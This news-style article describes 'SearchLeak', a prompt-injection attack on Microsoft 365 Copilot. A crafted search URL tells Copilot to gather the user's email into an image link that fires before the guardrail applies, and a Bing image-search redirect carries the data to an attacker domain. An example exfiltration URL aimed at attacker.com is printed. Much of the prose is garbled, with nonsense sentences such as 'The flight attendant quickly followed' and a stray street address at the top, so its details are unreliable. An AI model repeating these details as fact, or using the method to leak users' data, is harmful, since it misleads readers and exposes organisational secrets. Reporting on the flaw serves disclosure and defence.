Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
To perform Parameter-to-Prompt Injection an attacker sends the target an email containing a URL containing the words https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. This field contains instructions. The flight attendant quickly followed.
“Exploratory services are what the attackers need, because even if they have limited power, the user of the necessary information is sufficient,” the researchers he wrote on Monday. “To extract the information, the attacker creates a link that tells Copilot to ‘Search the user’s email,’ removes the subject, and puts it in an image link.” The victim does not write anything. They click a link, and Copilot does the rest.
Usually, the wrap guardrail comes out blocks would kick in. But the researchers discovered that the protection fires only after the “thinking” phase. Prior to that, Copilot generated its response using raw HTML, which is temporarily rendered in the browser DOM.
The researchers wrote:
So, the process looks like this:
- Copilot is starting to roll out its solution, which includes
tags
- The browser sees it
it interprets it, and fires an HTTP request to the src URL
- Copilot completes production. The guardrail wraps everything
- Too late! The request is already gone.
The researchers now had an image request firing from their target browser. The problem, as mentioned before, is that Copilot does not send image requests to most websites. To increase this security, the operating system used Microsoft’s Bing search engine as a trampoline of sorts. According to Copilot’s security policy, Bing is among the sites that are allowed to send these requests. Bing then forwards the request to the attacker-controlled domain that was included in the request. The request looked like this:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
Varonis called the attack SearchLeak.
“Since SearchLeak targets Microsoft’s Enterprise division, the breach is not limited to personal data — it can reveal anything a user has access to within an organization including emails, meeting invitations and documents,” the company’s researchers wrote. “SharePoint documents, OneDrive files, and other indexed business objects. Depending on how M365 interacts with the environment, the blast radius can get bigger.”
As we have seen, Microsoft fixed the vulnerability that SearchLeak used on Tuesday. Without a known solution to the root cause of SNAFUs, however, attackers will find new ways to bypass newly built infrastructure, and the process will repeat itself.
